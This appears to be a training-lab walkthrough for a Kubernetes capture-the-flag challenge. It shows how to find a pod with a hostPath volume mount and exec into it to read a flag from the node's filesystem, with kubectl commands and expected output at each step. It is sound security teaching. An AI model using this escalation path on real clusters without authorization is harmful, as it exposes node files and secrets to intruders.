Skip to content

Airborneio 24 Challenge

The Airborneio 24 challenge requires you to find a flag located on the Kubernetes node's file system. Without direct access to the file system and a view only Kubernetes role, you will need to find a misconfiguration in an existing resource to gain access to the flag.

Host Path Mount Misconfiguration

Pods often need to store data on the file system as processes execute. Kubernetes supports many different volume types. The Kubernetes hostPath volume mount provides persisted storage for a pod using a directory on the host node's filesystem. Often the most simple way to gain persisted storage, the host path mount can be a powerful attack vector for privilege escalation.

Review the pod configurations in the hth namespace. Which pod is using a hostPath mount configuration? What directory on the host node's filesystem is being mounted into the pod?

Hint

  • List the pods running in the hth namespace. Make a note of the api pod's name, as you will need this in the next step.

    kubectl get pods -n hth

    Expected Output

    NAME            READY   STATUS    RESTARTS   AGE
api-randomid    1/1     Running   0          2d21h
ui-randomid     1/1     Running   0          2d21h

  • Describe the configuration for each pod using the kubectl describe pod command. Search the output for the pod that has a Volume with a Type set to HostPath. The volume's Path is pointing to a directory on the node's file system that will be accessible from inside a pod running in the cluster.

    kubectl describe pod -n hth ENTER_API_POD_NAME

    Expected Output

    Volumes:
  hth:
    Type:          HostPath (bare host directory volume)
    Path:          ?????
    HostPathType:  DirectoryOrCreate

  • The same pod will have a Mount referencing the hth volume. The mount will specify that specifies the directory inside the container.

    Expected Output

    Mounts:
  ????? from hth (ro)
  /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-rgfww (ro)
Answer

  • With this knowledge, you have discovered a host path mount attack path to get from a compromised api pod to the node's filesystem.

    Pod: api-randomid
Pod Mount Location: /mnt/hth/
Host Path Location: /opt/data/hth

Host Path Mount Privilege Escalation

Given a scenario where the pod is compromised, an attacker can use the hostPath volume mount to gain unauthorized access data on the Kubernetes node. Use the kubectl exec command to obtain a shell on the compromised pod and exfiltrate the airborneio-24 flag from the Kubernetes node's filesystem.

Hint

  • Use the kubectl exec command to obtain a shell on the compromised pod.

    kubectl exec --stdin --tty -n hth ENTER_API_POD_NAME -- /bin/bash

    Expected Output

    root@api-randomid:/#

  • Once inside the pod, list the contents of the mount location.

    ls -l ?????

    Expected Output

    total 0
drwxr-xr-x. 2 root root 68 Nov  8 23:03 api
drwxr-xr-x. 2 root root 27 Nov  8 23:03 secrets

  • List the contents of the directory to find the airborneio-24 flag.

    ls -l ?????/secrets/

    Expected Output

    -rw-r--r--. 1 root root 42 Nov  8 23:03 airborneio-24

  • Use the cat command to read the contents of the airborneio-24 file and retrieve the flag.

  • Run the following command to exit the shell and return to your local machine.

    exit
Answer

  • The airborneio-24 flag is located in the /mnt/hth/secrets directory on the container's filesystem.

    cat /mnt/hth/secrets/airborneio-24

    Expected Output

    hth{?????}

Next Challenge

Congratulations! You have identified a host path mount misconfiguration and exfiltrated the Airborneio 24 flag from the Kubernetes node's file system.

Continue to the Shadowhawk Challenge to learn how Kubernetes pods can inherit permissions from the underlying Kubernetes node.